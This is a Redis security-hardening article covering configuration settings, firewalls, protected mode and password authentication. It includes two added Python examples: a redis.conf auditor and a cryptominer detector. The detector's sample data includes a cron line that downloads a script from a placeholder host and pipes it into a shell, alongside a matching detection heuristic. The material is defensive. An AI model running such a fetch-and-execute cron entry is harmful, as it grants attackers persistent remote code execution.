Derived from the phrase Remote Dictionary Server, Redis is an in-memory data structure project that implements a distributed, in-memory key-value database with flexible durability. Redis can be placed between a web application and its database as a cache that stores database responses as key-value pairs, thereby reducing database calls and server load.
These key-value pairs live in memory (the server's RAM), which makes access a thousand times faster than reading from a hard disk but costlier to implement. Redis returns the value for the key the application requests; if the key is not present in Redis, the application queries the database and stores the result in Redis for subsequent requests.
Redis supports multiple data structures, like string, list, set, sorted set, hash table, HyperLogLog, bitmap, stream, and spatial index. It is used by many famous brands like Netflix, Twitter, Amazon, and Microsoft. According to Shodan.io, Redis is deployed on more than five lakh (500,000) servers worldwide.
Many industries, like gaming, financial services, healthcare, and IT, use Redis to solve their business problems. Developers integrate Redis with Apache Solr to reflect product inventory updates quickly, using Redis' in-memory store capability.
Redis' Publisher/Subscriber (Pub/Sub) or message broker capability underpins microservices architectures: it decouples the services and makes their communication more effective. Redis can be used in geospatial apps to process and analyze geospatial data in real time, and to build chat systems and social networking sites.
Companies like Uber and Tinder leverage its Pub/Sub capabilities to build fault-tolerant, highly available architectures. Tinder's back-end infrastructure relies on Redis-based caching to fulfill the requests generated by more than 2 billion users of the Swipe feature per day, and hosts more than 30 billion matches across 190 countries globally.
To ensure all security loopholes are plugged, an organization must take the following measures:
Redis has no authentication by default and does not support encryption; all data is stored in cleartext. An attacker who can reach the server can use the FLUSHALL command to delete every key-value data set. To protect the Redis server, update the configuration file as described below:
Path of the config file -> /etc/redis/redis.conf
# bind 127.0.0.1
It will only accept client connections made to localhost. (Private mode)
# bind 0.0.0.0
It will accept all connections made to any address. (Public mode)
Running Redis as the root user dramatically increases the damage an attacker can cause if a session is hijacked. It is better to run it as an unprivileged, dedicated Redis user, since the root user can run any administrative command that changes the system configuration, such as starting or stopping a service.
Use firewall rules to restrict traffic from the outside world into the internal network, allowing only trusted clients. If no communication is required from outside the network, block incoming traffic to port 6379 with network access control lists; otherwise, the information stored in Redis would be accessible to external applications.
Protected mode is recommended when Redis runs with the default configuration (binding all interfaces) and without any password. In this mode, Redis replies only to the loopback address and returns an error to clients connecting from any other address. Uncomment the following line in the configuration file to run Redis in protected mode.
# protected-mode yes
Because it is stored inside the redis.conf file, the Redis password can be very long. Ensure the password is strong and lengthy enough to withstand brute-force attacks: a password-cracking tool can test around 150K passwords per second against a Redis server. To add password authentication to Redis, uncomment the following line in the configuration file and replace the password that follows it.
# requirepass foobared
Like every other Redis command, the AUTH command is sent unencrypted, so an attacker with enough network access can eavesdrop on it (network sniffing). In such a scenario, an SSL proxy can be used to encrypt the traffic, which comes with a performance tradeoff.
Always monitor process and CPU consumption on servers to check for the presence of crypto-mining malware, as in the case of the RedisWannaMine worm. The worm downloads mining malware and gains persistence by creating a new cron job. The script steals the computing power of the victim's machine to mine cryptocurrencies, like Bitcoin.
Rename administrative commands at your discretion. For example, the CONFIG command can be renamed to something hard to guess in a shared environment, so that it remains recognizable to internal users and tools but not to anyone outside the team.
In the configuration file, uncomment the line below and put your chosen name in place of "…"
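The monitoring step above names two symptoms of a RedisWannaMine-style infection: a process consuming far more CPU than Redis should, and a cron job that did not exist when the server was deployed. The script below is an added example (not code from the original article) that checks both against constructed `ps` and crontab listings; the CPU threshold, the placeholder process name and URL, and the "downloads and pipes into a shell" heuristic are all assumptions made for the demo.

```python
"""Spot the two symptoms the article names for a RedisWannaMine-style
infection: a process hogging CPU and a cron job that was not there
before.

Added example, not code from the original article. The ps and crontab
listings below are constructed for the demo; the CPU threshold and the
'downloads and runs remote content' heuristic are assumptions.
"""

CPU_THRESHOLD = 80.0  # assumption: percent CPU worth investigating

# Constructed output in the shape of `ps -eo pid,pcpu,user,comm`.
PS_SAMPLE = """\
  PID %CPU USER     COMMAND
  812  0.3 redis    redis-server
 1204 97.8 redis    placeholder-miner
 1310  1.1 root     sshd
"""

# Constructed crontab listings: the baseline recorded at deployment and
# the listing captured now. The URL is a placeholder, not a real host.
CRON_BASELINE = """\
0 3 * * * /usr/local/bin/backup-redis.sh
"""
CRON_NOW = """\
0 3 * * * /usr/local/bin/backup-redis.sh
*/5 * * * * curl -s http://placeholder.invalid/x.sh | sh
"""


def high_cpu_processes(ps_output, threshold=CPU_THRESHOLD):
    """Return (pid, user, command) for every process at or above threshold."""
    hits = []
    for line in ps_output.strip().splitlines()[1:]:  # skip the header row
        pid, pcpu, user, comm = line.split(None, 3)
        if float(pcpu) >= threshold:
            hits.append((int(pid), user, comm))
    return hits


def _entries(crontab):
    """Non-empty, non-comment crontab lines as a set."""
    return {l.strip() for l in crontab.splitlines()
            if l.strip() and not l.lstrip().startswith("#")}


def new_cron_entries(baseline, current):
    """Cron lines present now that were not in the baseline."""
    return sorted(_entries(current) - _entries(baseline))


def fetches_and_runs_remote_content(entry):
    """Heuristic (assumption): a job that downloads something and pipes it
    straight into a shell matches the persistence pattern the article
    describes."""
    downloads = any(tool in entry for tool in ("curl", "wget"))
    return downloads and ("| sh" in entry or "| bash" in entry)


def report(ps_output, baseline, current):
    """Combine both checks into a list of human-readable findings."""
    findings = [f"high cpu: pid {pid} ({user}) {comm}"
                for pid, user, comm in high_cpu_processes(ps_output)]
    for entry in new_cron_entries(baseline, current):
        tag = ("downloads+runs remote content"
               if fetches_and_runs_remote_content(entry) else "new")
        findings.append(f"cron ({tag}): {entry}")
    return findings


if __name__ == "__main__":
    for finding in report(PS_SAMPLE, CRON_BASELINE, CRON_NOW):
        print(finding)
```

On a real host, feed `report()` the live `ps -eo pid,pcpu,user,comm` output and the current `crontab -l` for the redis user, and keep the baseline crontab under version control so the diff is meaningful.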
# rename-command CONFIG "…"
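The bind, protected-mode, requirepass and rename-command steps above are all edits to redis.conf, so the natural check is a script that reads the file and reports which of them are still missing. The following is an added example, not code from the original article or from the Redis project: it parses the active (uncommented) directives and flags the weak settings the article describes. The two sample configurations, the minimum password length, and the choice of FLUSHALL and CONFIG as the commands that should be renamed are constructed for this demo.

```python
"""Audit a redis.conf against the hardening steps discussed above.

Added example, not code from the original article or from the Redis
project. It checks the four directives the article covers (bind,
protected-mode, requirepass, rename-command); the two sample
configurations and the thresholds are constructed for this demo.
"""
import shlex

# Constructed sample: every hardening directive still commented out.
WEAK_CONF = """\
# bind 127.0.0.1
bind 0.0.0.0
# protected-mode yes
protected-mode no
# requirepass foobared
# rename-command CONFIG ""
"""

# Constructed sample: the same file after applying the article's advice.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass 9f3c7a1e5b2d4c8a6e0f1b3d5a7c9e2f4b6d8a0c1e3f5a7b9d1f3e5c7a9b1d3f
rename-command CONFIG "cfg-7d2e9a4c1b"
rename-command FLUSHALL ""
"""

# Assumptions for this example: a minimum password length, and the two
# commands the article singles out (FLUSHALL, CONFIG) that should not
# keep their default names on a shared server.
MIN_PASSWORD_LENGTH = 32
ADMIN_COMMANDS = ("CONFIG", "FLUSHALL")


def parse_conf(text):
    """Return the active directives as a list of (name, args).

    Lines starting with '#' are comments and are skipped, exactly like
    the commented-out lines the article tells you to uncomment. Redis
    lowercases directive names when it loads the file, so we do too;
    shlex keeps a quoted empty string ("") as an argument, which is
    how a command is disabled.
    """
    directives = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        directives.append((parts[0].lower(), parts[1:]))
    return directives


def audit(text):
    """Return a list of findings; an empty list means every check passed."""
    values, renamed = {}, {}
    for name, args in parse_conf(text):
        if name == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            values[name] = args

    findings = []

    # bind: with no directive at all, Redis listens on every interface.
    binds = values.get("bind") or ["0.0.0.0"]
    if any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listens on all interfaces (public mode)")

    # protected-mode defaults to yes; anything else is a finding.
    if (values.get("protected-mode") or ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")

    # requirepass: missing, the sample value, or too short to resist
    # the ~150K guesses per second the article mentions.
    password = (values.get("requirepass") or [""])[0]
    if not password:
        findings.append("requirepass: no password set")
    elif password == "foobared":
        findings.append("requirepass: sample password 'foobared' left in place")
    elif len(password) < MIN_PASSWORD_LENGTH:
        findings.append(f"requirepass: shorter than {MIN_PASSWORD_LENGTH} characters")

    # rename-command: each admin command should be renamed or disabled.
    for cmd in ADMIN_COMMANDS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} keeps its default name")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf) or ["ok"])
```

Run it against `/etc/redis/redis.conf` by passing the file's contents to `audit()`; note that it reads only the file, so a value changed at runtime with CONFIG SET (and never written back with CONFIG REWRITE) will not be reflected.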
Redis Enterprise is a robust in-memory database platform built on open-source Redis with additional features like auto-failover, auto-sharding/scaling, easy backups, and disaster recovery capabilities.
Along with these resilience features, it also provides many other security features related to authentication and authorization. Some of the security features are mentioned below:
With Redis Enterprise Cloud, data access can be secured by IP filtering, which allows only application servers from an approved set of source IPs to authenticate to the database.
Security has become an inseparable part of developing and deploying applications. When designing cloud infrastructure, security must be implemented at the network level as well as at the application level. The goal is to deploy the Redis server with the smallest possible attack surface. After every measure has been taken to harden the Redis server, it should be impenetrable to attackers. A single vulnerability in the system design can compromise the whole system.
They say that "everything comes with a cost." While securing an application has a minor influence on its performance, it is recommended to run benchmark tests on the application with and without encryption to determine the performance impact. Since there is no single model of implementation and every industry has its own use case, it is crucial to have a comprehensive cloud security strategy in place.